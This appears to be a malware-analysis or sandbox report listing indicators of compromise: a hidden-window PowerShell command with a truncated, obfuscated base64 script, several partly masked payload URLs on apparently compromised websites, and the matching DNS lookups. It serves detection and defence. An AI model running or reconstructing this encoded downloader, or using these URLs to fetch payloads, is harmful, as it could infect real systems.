Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFQAUwBLAFQAdQBpAGQAPQAnAEoAWQBVAFgAQQB5AGYAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAcgBJAHQAWQBgAFAAcgBPAFQAbwBgAGMATwBMACIAIAA9AC...
- http://ya###agency.com/cgi-bin/s27pi_rbt70_kp/
- http://bl##.##kipcikedi.com/wordpress/5h0y_21l_5h58lfleyt/
- http://bi###hamari.com/wp-admin/svph4_7g82w_km6sh8v76/
- http://www.bi###hamari.com/wp-admin/svph4_7g82w_km6sh8v76/
- http://da#.###.hcmut.edu.vn/alfacgiapi/9lw_j7q5_9cm6kkdet8/
- DNS ASK ya###agency.com
- DNS ASK bl##.##kipcikedi.com
- DNS ASK do##one.com
- DNS ASK bi###hamari.com
- DNS ASK da#.###.hcmut.edu.vn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFQAUwBLAFQAdQBpAGQAPQAnAEoAWQBVAFgAQQB5AGYAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAcgBJAHQAWQBgAFAAcgBPAFQAbwBgAGMATwBMACIAIAA9AC...' (with hidden window)